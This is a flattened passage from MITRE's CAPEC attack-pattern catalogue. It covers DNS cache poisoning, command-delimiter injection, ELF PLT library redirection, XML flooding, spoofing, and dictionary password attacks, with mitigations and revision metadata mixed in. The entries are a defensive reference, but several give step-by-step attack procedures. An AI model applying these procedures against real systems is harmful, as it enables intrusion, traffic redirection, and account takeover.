Targeted 345 Targeted 349 Targeted 346 Secondary 441 Secondary 1000 Category ChildOf 210 1000 Attack Pattern CanPrecede 89 Penetration Exploitation High High High All All All All Wikipedia DNS Cache Poisoning The Wikimedia Foundation, Inc 2011-07-10 http://en.wikipedia.org/wiki/DNS_cache_poisoning DNS Threats and DNS Weaknesses DNS Threats & Weaknesses of the Domain Name System DNSSEC http://www.dnssec.net/dns-threats.php Wikipedia Arp Spoofing The Wikimedia Foundation, Inc 2011-07-17 http://en.wikipedia.org/wiki/ARP_spoofing Sean Barnum Cigital 2007-02-10 Initial core pattern content Sean Barnum Cigital 2007-02-10 Initial core pattern content Wendy Jin Cigital, Inc. Pre-Review of Content Tom Stracener Contract Security Engineer (MITRE) 20011-07-19 Review and Revision of Content Wendy Jin Cigital, Inc. Pre-Review of Content Tom Stracener Contract Security Engineer (MITRE) 20011-07-19 Review and Revision of Content CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns A domain name server translates a domain name (such as www.example.com) into an IP address that Internet hosts use to contact Internet resources. An attacker modifies a public DNS cache to cause certain names to resolve to incorrect addresses that the attacker specifies. The result is that client applications that rely upon the targeted cache for domain name resolution will be directed not to the actual address of the specified domain name but to some other address. Attackers can use this to herd clients to sites that install malware on the victim's computer or to masquerade as part of a Pharming attack. Explore resolver caches Check DNS caches on local DNS server and client's browser with DNS cache enabled. Run tools that check the resolver cache in the memory to see if it contains a target DNS entry. env-All Figure out if the client's browser has DNS cache enabled. env-All Found no entry in the resolver cache env-All The results show target DNS entry in DNS server env-All A list of DNS server information. No target entry found in the resolver cache. The results show target DNS entry in DNS server. Network scans can be logged in system logs. The scans may be from unknown local IP address. Attempt sending crafted records to DNS cache A request is sent to the authoritative server for target website and wait for the iterative name resolver. An attacker sends bogus request to the DNS local server, and then floods responses that trick a DNS cache to remember malicious responses, which are wrong answers of DNS query. Attacker must know the transaction ID by intercepting a DNS query, or sending a bogus query with known transaction ID. env-CommProtocol If the transaction ID used to identify each query instance is randomized in some new DNS software, the attack must guess the transaction ID. Slow the response of the real DNS server by causing Denial-of-service. This gives attacker enough time to guess transaction env-CommProtocol Attacker crafts DNS response with the same transaction ID as in the request. The attacker sends out DNS responses before the authorized DNS server. This forces DNS local cache stores fake DNS response (wrong answer). The fake DNS responses usually include a malicious website's IP address. env-CommProtocol DNS request that the attacker intercepts includes transaction ID. env-All The attacker successfully sends DNS response before authorized DNS server. env-All Transaction ID has been randomized. env-All The DNS server cache has recorded correct Name and IP address entry. In this case, the attacker needs to figure out a way to overwrite table entries to succeed env-All The attacker fails to send DNS response before authorized DNS server. In this case, the attacker needs to figure out a way to overwrite table entries to succeed env-All Any local machine that types names of the good server is redirected to a malicious server. Any local machine that types names of the good server is not redirected to a malicious server. Monitor log file and see a large number of DNS responses sent from the same host. This host may be manipulated by attacker. Redirect users to malicious website As the attacker succeeds in exploiting the vulnerability, the victim connects to a malicious site using a good web site's domain name. Redirecting Web traffic to a site that looks enough like the original so as to not raise any suspicion. env-Web Man-in-the-Middle intercepts secure communication between two parties. env-Web Any local machine that types names of the good server is redirected to a malicious server. The attacker accepts the incoming SSL connection, decrypts it, reads all the traffic, and makes the same request via SSL to the original site. Any local machine that types names of the good server is not redirected to a malicious server. Upgrade BIND. Use latest version Be less trusting of the information passed to them by other DNS servers, and ignoring any DNS records passed back which are not directly relevant to the query. To greatly reduce the probability of successful DNS race attacks. Use source port randomization for DNS requests, cryptographically-secure random numbers. A DNS cache must be vulnerable to some attack that allows the attacker to replace addresses in its lookup table. Client applications must trust the corrupted cashed values and utilize them for their domain name resolutions. High High Injection In this example, an attacker sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7. Local DNS usually caches IP addresses and do not go to remote DNS every time. Since the local record is not found, DNS server tries to connect to remote DNS for queries. However, before the remote DNS returns the right IP address 1.3.5.7, the attacker floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack. Medium To overwrite/modify targeted DNS cache The attacker must have the resources to modify the targeted cache. In addition, in most cases the attacker will wish to host the sites to which users will be redirected, although in some cases redirecting to a third party site will accomplish the attackers' goals. Configuration: Make sure your DNS servers have been updated to the latest versions Configuration: UNIX services like rlogin, rsh/rcp, xhost, and nfs are all susceptible to wrong information being held in a cache. Care should be taken with these services so they do not rely upon DNS caches that have been exposed to the Internet. Configuration: Disable client side DNS caching. A vector specifically crafted to poison DNS cache, so that all traffic is redirected to an unintended destination. DNS response DNS server cache Client's browser DNS cache Any local machine that types names of the good server is redirected to a malicious server. This attack assists pharming attack when victim is fooled into entering sensitive data into supposedly trusted locations. The attacker could also accept the incoming SSL connection, decrypts it, reads all the traffic, and makes the same request via SSL to the original site. 348 Targeted 345 Targeted 349 Targeted 346 Secondary 441 Secondary 350 Secondary CVE-2005-0877 Dnsmasq before 2.21 allows remote attackers to poison the DNS cache via answers to queries that were not made by Dnsmasq. CVE-2004-1754 The DNS proxy (DNSd) for multiple Symantec Gateway Security products allows remote attackers to poison the DNS cache via a malicious DNS server query response that contains authoritative or additional records. 1000 Attack Pattern ChildOf 141 1000 Attack Pattern ChildOf 161 1000 Attack Pattern CanPrecede 89 Penetration Exploitation High High High All All All All Wikipedia DNS Cache Poisoning The Wikimedia Foundation, Inc 2011-07-10 http://en.wikipedia.org/wiki/DNS_cache_poisoning DNS Threats and DNS Weaknesses DNS Threats & Weaknesses of the Domain Name System DNSSEC http://www.dnssec.net/dns-threats.php Vulnerability Note VU#800113 US CERT 2008-07-08 http://www.kb.cert.org/vuls/id/800113#pat Sean Barnum Cigital 2007-02-10 Initial core pattern content Sean Barnum Cigital 2007-02-10 Initial core pattern content Wendy Jin Cigital, Inc. Pre-Review of Content Tom Stracener Contract Security Engineer (MITRE) 2011-07-19 Review and Revision of Content Wendy Jin Cigital, Inc. Pre-Review of Content Tom Stracener Contract Security Engineer (MITRE) 2011-07-19 Review and Revision of Content CAPEC Content Team MITRE 2014-02-06 Updated Resources_Required An attacker searches a targeted web site for web pages that have not been publicized. Generally this involves mapping the published web site by spidering through all the published links and then attempt to access well-known debugging or logging pages, or otherwise predictable pages within the site tree. For example, if an attacker might be able to notice a pattern in the naming of documents and extrapolate this pattern to discover additional documents that have been created but are no longer externally linked. Using this, the attacker may be able to gain access to information that the targeted site did not intend to make public. The targeted web site must include pages within its published tree that are not connected to its tree of links. The sensitivity of the content of these pages determines the severity of this attack. Low Spidering tools to explore the target web site are extremely useful in this attack especially when attacking large sites. Some tools might also be able to automatically construct common page locations from known paths. 1000 Attack Pattern ChildOf 87 CAPEC Content Team MITRE 2014-02-06 Updated Type (Attack_Pattern -> Attack_Pattern) An attacker searches a targeted web site for web services that have not been publicized. Generally this involves mapping the published web site by spidering through all the published links and then attempt to access well-known debugging or logging services, or otherwise predictable services within the site tree. This attack can be especially dangerous since unpublished but available services may not have adequate security controls placed upon them given that an administrator may believe they are unreachable. The targeted web site must include unpublished services within its web tree. The nature of these services determines the severity of this attack. Low Spidering tools to explore the target web site are extremely useful in this attack especially when attacking large sites. Some tools might also be able to automatically construct common service queries from known paths. 1000 Attack Pattern ChildOf 87 CAPEC Content Team MITRE 2014-02-06 Updated Type (Attack_Pattern -> Attack_Pattern) An attacker spoofs a checksum message for the purpose of making a payload appear to have a valid corresponding checksum. Checksums are used to verify message integrity. They consist of some value based on the value of the message they are protecting. Hash codes are a common checksum mechanism. Both the sender and recipient are able to compute the checksum based on the contents of the message. If the message contents change between the sender and recipient, the sender and recipient will compute different checksum values. Since the sender's checksum value is transmitted with the message, the recipient would know that a modification occurred. In checksum spoofing an attacker modifies the message body and then modifies the corresponding checksum so that the recipient's checksum calculation will match the checksum (created by the attacker) in the message. This would prevent the recipient from realizing that a change occurred. The attacker must be able to intercept a message from the sender (keeping the recipient from getting it), modify it, and send the modified message to the recipient. The sender and recipient must use a checksum to protect the integrity of their message and transmit this checksum in a manner where the attacker can intercept and modify it. The checksum value must be computable using information known to the attacker. A cryptographic checksum, which uses a key known only to the sender and recipient, would thwart this attack. Medium The attacker must be able to intercept and modify messages between the sender and recipient. 1000 Attack Pattern ChildOf 148 An attacker corrupts or modifies the content of XML schema information passing between client and server for the purpose of undermining the security of the target. XML Schemas provide the structure and content definitions for XML documents. Schema poisoning is the ability to manipulate a schema either by replacing or modifying it to compromise the programs that process documents that use this schema. Possible attacks are denial of service attacks by modifying the Schema so that it does not contain required information for subsequent processing. For example, the unaltered schema may require a @name attribute in all submitted documents. If the attacker removes this attribute from the schema then documents create using the new grammar will lack this field, which may cause the processing application to enter an unexpected state or record incomplete data. In addition, manipulation of the data types described in the schema may affect the results of calculations taken by the document reader. For example, a float field could be changed to an int field. Finally, the attacker may change the encoding defined in the schema for certain fields allowing the contents to bypass filters that scan for dangerous strings. For example, the modified schema might us a URL encoding instead of ASCII, and a filter that catches a semicolon (;) might fail to detect its URL encoding (%3B). The schema used by the target application must be improperly secured against unauthorized modification and manipulation. High Access to the schema and the knowledge and ability modify it. Ability to replace or redirect access to the modified schema. Design: Protect the schema against unauthorized modification. Implementation: For applications that use a known schema, use a local copy or a known good repository instead of the schema reference supplied in the XML document. 15 Targeted 472 Secondary 1000 Attack Pattern ChildOf 271 An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target. Survey the target Using a browser or an automated tool, an attacker records all instance of web services to process XML requests. Use an automated tool to record all instances of URLs to process XML requests. env-Web env-ClientServer Use a browser to manually explore the website and analyze how the application processes XML requests. env-Web env-ClientServer The URL processes XML requests. env-Web env-ClientServer The application does not accept XML requests. env-Web env-ClientServer A list of URLs which process XML requests. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Launch a resource depletion attack The attacker delivers a large number of small XML messages to the target URLs found in the explore phase at a sufficiently rapid rate. It causes denial of service to the target application. Send a large number of crafted small XML messages to the target URL. env-Web env-ClientServer The attacker causes the target application denial of service. Monitor velocity of page fetching in web logs. Build throttling mechanism into the resource allocation. Provide for a timeout mechanism for allocated resources whose transaction does not complete within a specified interval. The target must receive and process XML transactions. Medium Low Flooding Consider the case of attack performed against the createCustomerBillingAccount Web Service for an online store. In this case, the createCustomerBillingAccount Web Service receives a huge number of simultaneous requests, containing nonsense billing account creation information (the small XML messages). The createCustomerBillingAccount Web Services may forward the messages to other Web Services for processing. The application suffers from a high load of requests, potentially leading to a complete loss of availability the involved Web Service. Low To send small XML messages High To use distributed network to launch the attack Transaction generator(s)/source(s) and ability to cause arrival of messages at the target with sufficient rapidity to overload target. Larger targets may be able to handle large volumes of requests so the attacker may require significant resources (such as a distributed network) to affect the target. However, the resources required of the attacker would be less than in the case of a simple flooding attack against the same target. Design Build throttling mechanism into the resource allocation. Provide for a timeout mechanism for allocated resources whose transaction does not complete within a specified interval. Implementation: Provide for network flow control and traffic shaping to control access to the resources. Availability DoS: resource consumption (other) DoS: resource consumption (other) XML-capable system interfaces Maliciously crafted XML messages XML inspection, parsing and validation routines. Denial of Service 400 Targeted 770 Targeted CAPEC-159 Redirect Access to Libraries 1000 Attack Pattern ChildOf 82 http://capec.mitre.org/data/definitions/82.html 1000 Attack Pattern ChildOf 125 Exploitation Low Low High SOA Web All All Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content MITRE Content Team MITRE 2013-06-21 Updated Solution_or_Mitigation Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content An attacker modifies content to make it contain something other than what the original content producer intended while keeping the apparent source of the content unchanged. The term content spoofing is most often used to describe modification of web pages hosted by a target to display the attackers' content instead of the owner's content. However, any content can be spoofed, including the content of email messages, file transfers, or the content of other network communication protocols. Content can be modified at the source (e.g. modifying the source file for a web page) or in transit (e.g. intercepting and modifying a message between the sender and recipient). Usually, the attacker will attempt to hide the fact that the content has been modified, but in some cases, such as with web site defacement, this is not necessary. Content Spoofing can lead to malware exposure, financial fraud if the content governs financial transactions, privacy violations, and other results. The target must provide content but fail to adequately protect it against modification. Medium No special resources are required by the client for most forms of the attack. If the content is to be modified in transit, the attacker must be able to intercept the targeted messages. In some variants, the targeted content is altered so that all or some of it is redirected towards content published by the attacker (for example, images and frames in the target's web site might be modified to be loaded from a source controlled by the attacker). In these cases, the attacker must be able to host the replacement content. 1000 Category ChildOf 156 333 Category HasMember 345 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker explores a target to identify the names and locations of predictable temporary files for the purpose of launching further attacks against the target. This involves analyzing naming conventions and storage locations of the temporary files created by a target application. If an attacker can predict the names of temporary files they can use this information to mount other attacks, such as information gathering and symlink attacks. The targeted application must create names for temporary files using a predictable procedure, e.g. using sequentially increasing numbers. Medium The attacker must be able to see the names of the files the target is creating. 1000 Attack Pattern ChildOf 150 An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or a blacklist input validation, as opposed to whitelist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or blacklist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on. Assess Target Runtime Environment In situations where the runtime environment is not implicitly known, the attacker makes connections to the target system and tries to determine the system's runtime environment. Knowing the environment is vital to choosing the correct delimiters. Port mapping using network connection-based software (e.g., nmap, nessus, etc.) env-ClientServer env-Embedded env-CommProtocol env-Peer2Peer env-Web Port mapping by exploring the operating system (netstat, sockstat, etc.) env-Local TCP/IP Fingerprinting env-All Induce errors to find informative error messages env-All The target software accepts connections via the network. env-Web env-CommProtocol env-Peer2Peer env-Embedded Operating environment (operating system, language, and/or middleware) is correctly identified. Multiple candidate operating environments are suggested. Provide misleading information on TCIP/IP fingerprints (some operating systems can be configured to send signatures that match other operating systems). Provide misleading information at the server level (e.g., Apache, IIS, WebLogic, etc.) to announce a different server software. Some fingerprinting techniques can be detected by operating systems or by network IDS systems because they leave the network connection half-open, or they do not belong to a valid, open connection. Survey the Application The attacker surveys the target application, possibly as a valid and authenticated user Spidering web sites for all available links env-Web Inventory all application inputs env-All Attacker develops a list of valid inputs env-Web env-ClientServer The attacker develops a list of likely command delimiters. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. Monitor velocity of feature activations (non-web software). Humans who activate features (click buttons, request actions, invoke APIs, etc.) will do so far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Attempt delimiters in inputs The attacker systematically attempts variations of delimiters on known inputs, observing the application's response each time. Inject command delimiters using network packet injection tools (netcat, nemesis, etc.) env-CommProtocol env-Web env-Peer2Peer env-ClientServer Inject command delimiters using web test frameworks (proxies, TamperData, custom programs, etc.) env-Web Enter command delimiters directly in input fields. env-Embedded env-Local env-ClientServer Attack step 2 is successful. env-All One or more command delimiters for the platform provokes an unexpected response from the software, which can be varied by the attacker based on the input. Use malicious command delimiters The attacker uses combinations of payload and carefully placed command delimiters to attack the software. The software performs as expected by the attacker. Software's input validation or filtering must not detect and block presence of additional malicious command. High High Injection By appending special characters, such as a semicolon or other commands that are executed by the target process, the attacker is able to execute a wide variety of malicious commands in the target process space, utilizing the target's inherited permissions, against any resource the host has access to. The possibilities are vast including injection attacks against RDBMS (SQL Injection), directory servers (LDAP Injection), XML documents (XPath and XQuery Injection), and command line shells. In many injection attacks, the results are converted back to strings and displayed to the client process such as a web browser without tripping any security alarms, so the network firewall does not log any out of the ordinary behavior. LDAP servers house critical identity assets such as user, profile, password, and group information that is used to authenticate and authorize users. An attacker that can query the directory at will and execute custom commands against the directory server is literally working with the keys to the kingdom in many enterprises. When user, organizational units, and other directory objects are queried by building the query string directly from user input with no validation, or other conversion, then the attacker has the ability to use any LDAP commands to query, filter, list, and crawl against the LDAP server directly in the same manner as SQL injection gives the ability to the attacker to run SQL commands on the database. Medium The attacker has to identify injection vector, identify the specific commands, and optionally collect the output, i.e. from an interactive session. Ability to communicate synchronously or asynchronously with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP. Design: Perform whitelist validation against a positive specification for command length, type, and parameters. Design: Limit program privileges, so if commands circumvent program input validation or filter routines then commands do not running under a privileged account Implementation: Perform input validation for all remote content. Implementation: Use type conversions such as JDBC prepared statements. Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Read application data Malicious input delivered through appending delimiters to standard input Command(s) appended to valid parameters to enable attacker to execute commands on host Client machine and client network Enables attacker to execute server side code with any commands that the program owner has privileges to. 146 Targeted 77 Targeted 184 Targeted 78 Targeted 185 Targeted 93 Targeted 140 Targeted 157 Targeted 138 Targeted 154 Targeted 697 Targeted 713 Targeted 1000 Attack Pattern ChildOf 6 1000 Attack Pattern ChildOf 248 Penetration High High High All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.15.1][REF-2] Cigital, Inc 2007-01-01 [R.15.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Paco Hope Cigital, Inc. 2007-10-20 Added extended Attack Execution Flow Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Paco Hope Cigital, Inc. 2007-10-20 Added extended Attack Execution Flow CAPEC Content Team MITRE 2013-12-18 Updated Attack_Phases CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases An attacker exploits well-known locations for resources for the purposes of undermining the security of the target. In many, if not most, systems, files and resources are organized in the same tree structure. This can be useful for attackers because they often know where to look for resources or files that are necessary for attacks. Even when the precise location of a targeted resource may know be known, naming conventions may indicate a small area of the target machine's file tree where the resources are typically located. For example, configuration files are normally stored in the /etc director on Unix systems. Attackers can take advantage of this to commit other types of attacks. The targeted applications must either expect files to be located at a specific location or, if the location of the files can be configured by the user, the user either failed to move the files from the default location or placed them in a conventional location for files of the given type. Medium No special resources are required for most variants of this attack. In some cases, the attacker need not even have direct access to the locations on the target computer where the targeted resources reside. 1000 Attack Pattern ChildOf 154 CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker crafts a message that masquerades as a message from a principal other than the actual message sender. This may involve having the attacker create content for the purpose of making it appear to originate from a legitimate "spoofed" source. Phishing and Pharming attacks often attempt to do this so that their attempts to gather sensitive information appear to come from a legitimate source. Alternatively, an attacker may intercept a message from a legitimate sender and attempt to make it look like the message comes from them without changing its content. The latter form of this attack can be used to hijack credentials from legitimate users. This attack need not be limited to transmitted messages - any resource that is associated with an identity (for example, a file with a signature) can be the target of an attack where the attacker attempts to change the apparent source. This attack differs from Content Spoofing attacks since, in Content Spoofing, the attacker does not wish to change the apparent source of the message but instead wishes to change what the source appears to say. In an Identity Spoofing attack, the attacker is attempting to change the apparent source of the content. The identity associated with the message or resource must be removable or modifiable in an undetectable way for the attacker to perform this attack. Medium No special resource are required for most variants of this attack. 1000 Category ChildOf 156 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker exploits a weakness in input validation by controlling the format, structure, and composition of data to an input-processing interface. By supplying input of a non-standard or unexpected form an attacker can adversely impact the security of the target. For example, using a different character encoding might cause dangerous text to be treated as safe text. Alternatively, the attacker may use certain flags, such as file extensions, to make a target application believe that provided data should be handled using a certain interpreter when the data is not actually of the appropriate type. This can lead to bypassing protection mechanisms, forcing the target to use specific components for input processing, or otherwise causing the user's data to be handled differently than might otherwise be expected. This attack differs from Variable Manipulation in that Variable Manipulation attempts to subvert the target's processing through the value of the input while Input Data Manipulation seeks to control how the input is processed. The target must accept user data for processing and the manner in which this data is processed must depend on some aspect of the format or flags that the attacker can control. Medium No special resources are required for most variants of this attack. 1000 Category ChildOf 262 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker utilizes discovered or crafted file path information for the purpose of locating and exploiting a security sensitive resource. This category of attack involves the paths used by an application to store or retrieve resources. Specifically, attacks in this category involve manipulating the path, causing the application to look in location unintended by the application maintainer, or determining the paths through prediction or lookup. This differs from File Manipulation attacks in which the contents of the files are affected or where the files themselves are physically moved. Instead, this attack simply concerns itself with the paths used to find or create resources. None. All applications rely on file paths and so, in theory, they or their resources could be affected by this attack. Medium No special resources are required for most variants of this attack. 1000 Category ChildOf 262 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker exploits the temporary, insecure storage of information by monitoring the content of files used to store temp data during an application's routine execution flow. Many applications use temporary files to accelerate processing or to provide records of state across multiple executions of the application. Sometimes, however, these temporary files may end up storing sensitive information. By screening an application's temporary files, an attacker might be able to discover such sensitive information. For example, web browsers often cache content to accelerate subsequent lookups. If the content contains sensitive information then the attacker could recover this from the web cache. The target application must utilize temporary files and must fail to adequately secure them against other parties reading them. Medium Because some application may have a large number of temporary files and/or these temporary files may be very large, an attacker may need tools that help them quickly search these files for sensitive information. If the attacker can simply copy the files to another location and if the speed of the search is not important, the attacker can still perform the attack without any special resources. 311 Targeted 1000 Category ChildOf 223 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker monitors information transmitted between logical or physical nodes of a network. The attacker need not be able to prevent reception or change content but must simply be able to observe and read the traffic. The attacker might precipitate or indirectly influence the content of the observed transaction, but the attacker is never the intended recipient of the information. Any transmission medium can theoretically be sniffed if the attacker can listen to the contents between the sender and recipient. Any target that transmits readable data could be attacked in this way. Cryptographic techniques that render a data-stream unreadable can thwart this type of attack. Medium The attacker must be able to intercept the transmissions containing the data of interest. Depending on the medium of transmission and the path the data takes between the sender and recipient, the attacker may require special equipment and/or require that this equipment be placed in specific locations. 311 Targeted 1000 Attack Pattern ChildOf 117 An attacker monitoring network traffic between nodes of a public or multicast network. The attacker need not be able to prevent reception or change content but must simply be able to observe and read the traffic. The attacker might precipitate or indirectly influence the content of the observed transaction, but the attacker is never the intended recipient of the information. This differs from other sniffing attacks in that it is over a public network rather via some other communications channel, such as radio. Any target that transmits readable data over a public or multicast network could be attacked in this way. Cryptographic techniques that render a data-stream unreadable can thwart this type of attack. Medium The attacker must be able to intercept the transmissions containing the data of interest. Depending on the network topology between the recipients, placement of listening equipment may be challenging (such as if both the sender and recipient are members of a single subnet and therefore the listener must also be attached to that subnet. 1000 Attack Pattern ChildOf 157 An attacker exploits the execution flow of a call to an external library to point to an attacker supplied library or code base, allowing the attacker to compromise the application or server via the execution of unauthorized code. An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. If an attacker can redirect an application's attempts to access these libraries to other libraries that the attacker supplies, the attacker will be able to force the targeted application to execute arbitrary code. This is especially dangerous if the targeted application has enhanced privileges. Access can be redirected through a number of techniques, including the use of symbolic links, search path modification, and relative path manipulation. Identify target general susceptibility An attacker uses an automated tool or manually finds whether the target application uses dynamically linked libraries and the configuration file or look up table (such as Procedure Linkage Table) which contains the entries for dynamically linked libraries. The attacker uses a tool such as the OSX "otool" utility or manually probes whether the target application uses dynamically linked libraries. env-Local The attacker finds the configuration files containing the entries to the dynamically linked libraries and modifies the entries to point to the malicious libraries the attacker crafted. env-Local The target application uses dynamically linked libraries. env-Local The attacker can redirect or control access to files in areas leveraged by the target. env-Local The attacker can modify the entries in the configuration files to the libraries the attacker crafted. env-Local The attacker cannot modify the configuration files entries. The attacker may still be able to redirect access to libraries using other techniques such as using symbolic links. env-Local The application does not use dynamically linked libraries. env-Local The attacker can successfully redirect or control access to libraries leveraged by the target. The attacker identifies and gains control of the configuration file containing entries of a list of dynamically linked libraries and be able to modify the entry to point to the malicious libraries the attacker created. Restrict the permission to modify the entries in the configuration file. Craft malicious libraries The attacker uses knowledge gained in the Explore phase to craft malicious libraries that he will redirect the target to leverage. These malicious libraries could have the same APIs as the legitimate library and additional malicious code. The attacker monitors the file operations performed by the target application using a tool like dtrace or FileMon. And the attacker can delay the operations by using "sleep(2)" and "usleep()" to prepare the appropriate conditions for the attack, or make the application perform expansive tasks (large files parsing, etc.) depending on the purpose of the application. env-Local The entries in the configuration file points to the malicious libraries he crafted. Restrict the permission to modify the entries in the configuration file. If possible, use obfuscation and other techniques to prevent reverse engineering the libraries. Redirect the access to libraries to the malicious libraries The attacker redirects the target to the malicious libraries he crafted in the Experiment phase. The attacker will be able to force the targeted application to execute arbitrary code when the application attempts to access the legitimate libraries. The attacker modifies the entries in the configuration files pointing to the malicious libraries he crafted. env-Local The attacker leverages symlink/timing issues to redirect the target to access the malicious libraries he crafted. 132 env-Local The attacker leverages file search path order issues to redirect the target to access the malicious libraries he crafted. 38 env-Local The application is redirected to the malicious libraries the attacker crafted when the application attempts to call the legitimate libraries. Restrict the permission to modify the entries in the configuration file. Check the integrity of the dynamically linked libraries before using them. If possible, use obfuscation and other techniques to prevent reverse engineering the libraries. The target must utilize external libraries and must fail to verify the integrity of these libraries before using them. Very High High Modification of Resources Injection API Abuse In this example, the attacker using ELF infection that redirects the Procedure Linkage Table (PLT) of an executable allowing redirection to be resident outside of the infected executable. The algorithm at the entry point code is as follows... • mark the text segment writeable • save the PLT(GOT) entry • replace the PLT(GOT) entry with the address of the new lib call The algorithm in the new library call is as follows... • do the payload of the new lib call • restore the original PLT(GOT) entry • call the lib call • save the PLT(GOT) entry again (if its changed) • replace the PLT(GOT) entry with the address of the new lib call Low To modify the entries in the configuration file pointing to malicious libraries Medium To force symlink and timing issues for redirecting access to libraries High To reverse engineering the libraries and inject malicious code into the libraries Implementation: Restrict the permission to modify the entries in the configuration file. Implementation: Check the integrity of the dynamically linked libraries before use them. Implementation: Use obfuscation and other techniques to prevent reverse engineering the libraries. Authorization Execute unauthorized code or commands Run Arbitrary Code Access_Control Authorization Bypass protection mechanism 714 Targeted CAPEC-132 Symlink redirect 1000 Attack Pattern ChildOf 176 http://capec.mitre.org/data/definitions/176.html 1000 Attack Pattern CanFollow 132 Exploitation Penetration High High High Client-Server All All All Silvio Cesare Share Library Call Redirection Via ELF PLT Infection Issue 56 Phrack Magazine 2000 http://www.phrack.org/issues.html?issue=56&id=7 OWASP Top 10 Top 10 2007 - Malicious File Execution 2007 The Open Web Application Security Project (OWASP) https://www.owasp.org/index.php/Top_10_2007-A3 Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content An attacker tries each of the words in a dictionary as passwords to gain access to the system via some user's account. If the password chosen by the user was a word within the dictionary, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern. Determine application's/system's password policy Determine the password policies of the target application/system. Determine minimum and maximum allowed password lengths. env-All Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary). env-All Determine account lockout policy (a strict account lockout policy will prevent brute force attacks). env-All Passwords are used in the application/system env-All Passwords are not used in the application/system. env-All Select dictionaries Pick the dictionaries to be used in the attack (e.g. different languages, specific terminology, etc.) Select dictionary based on particular users' preferred languages. env-All Select dictionary based on the application/system's supported languages. env-All Determine username(s) to target Determine username(s) whose passwords to crack. Obtain username(s) by sniffing network packets. env-CommProtocol env-Peer2Peer env-ClientServer Obtain username(s) by querying application/system (e.g. if upon a failed login attempt, the system indicates whether the entered username was valid or not) env-All Obtain usernames from filesystem (e.g. list of directories in C:\Documents and Settings\ in Windows, and list in /etc/passwd in UNIX-like systems) env-Embedded env-Local Remote application or system provides no indication regarding whether a given username is valid or not. env-ClientServer env-Peer2Peer env-Web env-CommProtocol At least one valid username found. Presence of any valid usernames could not be established. Do not reveal information regarding validity of particular usernames to users. Lock out accounts whose usernames are suspected to have been compromised. Use dictionary to crack passwords. Use a password cracking tool that will leverage the dictionary to feed passwords to the system and see if they work. Try all words in the dictionary, as well as common misspellings of the words as passwords for the chosen username(s). env-All Try common combinations of words in the dictionary, as well as common misspellings of the combinations as passwords for the chosen username(s). env-All Application/system does not use password authentication. env-All Attacker determines correct password for a user ID and obtains access to application or system. Attacker is unable to determine correct password for a user ID and obtain access to application or system. Large number of authentication failures in logs. Enforce strict account lockout policies. Enforce strong passwords (having sufficient length and containing mix of lower case and upper case letters, numbers, and special characters) The system uses one factor password based authentication. The system does not have a sound password policy that is being enforced. The system does not implement an effective password throttling mechanism. High Medium Brute Force A system user selects the word "treacherous" as their passwords believing that it would be very difficult to guess. The password-based dictionary attack is used to crack this password and gain access to the account. The Cisco LEAP challenge/response authentication mechanism uses passwords in a way that is susceptible to dictionary attacks, which makes it easier for remote attackers to gain privileges via brute force password guessing attacks. Cisco LEAP is a mutual authentication algorithm that supports dynamic derivation of 